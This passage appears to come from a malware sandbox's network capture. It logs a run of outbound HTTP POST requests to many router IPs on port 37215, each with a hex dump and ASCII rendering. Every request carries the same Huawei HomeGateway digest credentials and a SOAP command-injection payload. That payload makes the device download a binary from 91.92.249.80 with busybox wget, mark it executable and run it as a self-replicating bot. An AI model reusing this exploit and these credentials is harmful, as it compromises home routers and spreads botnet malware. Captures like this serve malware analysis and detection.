                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1497192.168.2.2339352133.8.21.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475888968 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1498192.168.2.235536441.5.17.537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475900888 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1499192.168.2.2357222197.208.72.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475914955 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1500192.168.2.2337734222.18.11.14737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475924969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1501192.168.2.235727895.233.189.1737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475930929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1502192.168.2.2359158180.29.189.21637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475936890 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1503192.168.2.2350834129.25.111.13137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476196051 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1504192.168.2.233648249.246.58.4237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476197004 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1505192.168.2.2339120157.1.181.5537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476222038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1506192.168.2.233488041.234.178.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.476377964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
